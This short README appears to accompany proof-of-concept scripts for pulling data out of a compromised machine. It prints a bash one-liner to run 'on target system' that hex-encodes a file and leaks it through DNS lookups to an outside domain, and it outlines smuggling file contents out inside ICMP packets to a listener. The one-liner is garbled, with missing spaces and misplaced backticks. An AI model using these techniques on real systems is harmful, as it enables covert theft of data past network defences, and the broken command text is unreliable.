Data Exfiltration PoC Scripts

DNS Exfliltration (dns_catch.py)

Run dns_catch.py on your DNS server.

On target system execute via bash: file="secretz.tgz"; key="moo"; domain="sensepost.com" i=1; md=$(cat$file| md5sum| cut -d " " -f 1); len=$((`xxd -p$file |wc -l)); for h in cat $file | xxd -p`; do host$h.0.$i.$len.$key.$domain; i=$(($i+1));done; host $md.1.$i.$len.$key.$domain

ICMP (icmp_shover.py)

Sending:

Read n bytes of file Convert to hex Create ICMP() packet with destination / source headers Pack ICMP() data section with the hex Drop it onto the wire!

Receving:

Listen on network interface for icmp packets (with a little signature) Unpack from data and write to file